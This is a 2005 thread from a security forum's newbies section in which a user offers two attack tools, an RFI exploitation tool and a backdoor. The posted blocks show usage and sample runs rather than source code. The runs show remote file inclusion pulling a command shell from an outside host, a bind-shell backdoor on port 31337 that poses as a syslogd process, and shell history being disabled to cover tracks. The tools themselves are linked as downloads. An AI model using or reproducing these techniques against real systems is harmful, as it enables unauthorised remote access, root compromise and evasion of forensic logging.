Waraxe IT Security Portal
Login or Register
June 17, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 36
Members: 0
Total: 36
Full disclosure
SEC Consult SA-20250604-0 :: Local Privilege Escalation and Default Credentials in INDAMED - MEDICAL OFFICE (Medical practice management) Demo version
Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Defense in depth -- the Microsoft way (part 89): user grouppolicies don't deserve tamper protection
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
Local information disclosure in apport and systemd-coredump
Stored XSS via File Upload - adaptcmsv3.0.3
IDOR "Change Password" Functionality - adaptcmsv3.0.3
Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
Authenticated File Upload to RCE - adaptcmsv3.0.3
Stored XSS in "Description" Functionality - cubecartv6.5.9
Multiple Vulnerabilities in SAP GuiXT Scripting
CVE-2024-47081: Netrc credential leak in PSF requests library
Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> 2 stupid programs but useful
Post new topicReply to topic View previous topic :: View next topic
2 stupid programs but useful
PostPosted: Sat Apr 16, 2005 2:59 pm Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




jajaj ok i know most of u r going to say that is lame mmm but well trying coding one...
Peace


NST-RFITool
Code:
/*
Name: NST-RFITool v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN <hck_zatan@hotmail.com>
Date: 02/04/05
Description: RFI Tool as well. Remote :) With shell :) =)

root@NeoSecurity:/home/hackzatan# ./NST-RFITool
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
[+] Usage: ./NST-RFITool <Host> <Archivo_Rfi> <cmd> <Shell_or_Command>
[+] example: ./NST-RFITool localhost /index.php "?&cmd=" "http://host.com/shell.gif"
[+] http://localhost/index.php?&cmd=id
['] Or you could use
[+] http://localhost/index.php?&cmd=http://host.com/shell.gif
root@NeoSecurity:/home/hackzatan# ./NST-RFITool localhost /index.php "?&cmd=" "http://saure.lithyum.org/0/cmd.gif?&cmd="
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
Starting NST-Shell...
(ctrl+c to exit)
Connecting localhost:80

NShell> id;uname -a;uptime;ls

uid=99(nobody) gid=98(nobody) groups=98(nobody)
Linux NeoSecurity 2.4.29 #6 Thu Jan 20 16:30:37 PST 2005 i686 unknown unknown GNU/Linux
21:40:51 up 11:33, 1 user, load average: 0.00, 0.02, 0.00
apache_pb.gif
index.php
END
NShell>
root@NeoSecurity:/home/hackzatan#

Under GPL
I accept no responsibilty for any damage caused by it.
Additons and fixes always welcome.
*/



NST-Backdoor
Code:
/*
Name: NST-Backdoor v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN
Date: 31/03/05 17:51
Description: Backdoor!!

root@NeoSecurity:/home/hackzatan# pico NST-Backdoor.c
root@NeoSecurity:/home/hackzatan# gcc NST-Backdoor.c -o NST-Backdoor
root@NeoSecurity:/home/hackzatan# ./NST-Backdooor
[+] NST-Backdoor v0.1 by HaCkZaTaN
[+] NeoSecurity
[*] Usage: ./NST-Backdoor <port>
root@NeoSecurity:/home/hackzatan# ./NST-Backdoor 31337
[+] NST-Backdoor v0.1 by HaCkZaTaN
[*] Connecting...
[*] Spawning Shell on port 31337. PID is 1887.
root@NeoSecurity:/home/hackzatan# ps -aux | grep syslogd-nst
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 1888 0.0 0.5 1256 344 pts/0 S 18:46 0:00 syslogd-nst oor 31337
root@NeoSecurity:/home/hackzatan# telnet localhost 31337
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
NST-Backdoor v0.1 - Have a lot of fun..
"export TERM=xterm; unset HISTFILE; unset SAVEHIST"sh-3.00#
sh-3.00# sh-3.00# export TERM=xterm; unset HISTFILE; unset SAVEHIST
sh-3.00# sh-3.00# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
sh-3.00# sh-3.00#

*/
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 5:40 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




where was the code ?

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 17, 2005 5:50 am Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




There is a link You dont see iit Smile

Well i post it again is in .rar

NST-RFITool

NST-Backdoor

Peace
View user's profile Send private message
PostPosted: Sun Apr 17, 2005 6:05 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




sorry bout that,
coz i just see you put a detailed how to use it in "[code]" place ,n it would be great if u put the real code in "[code]" place, so we could see a source code.

but its oke

peace too

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
2 stupid programs but useful
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.024 Seconds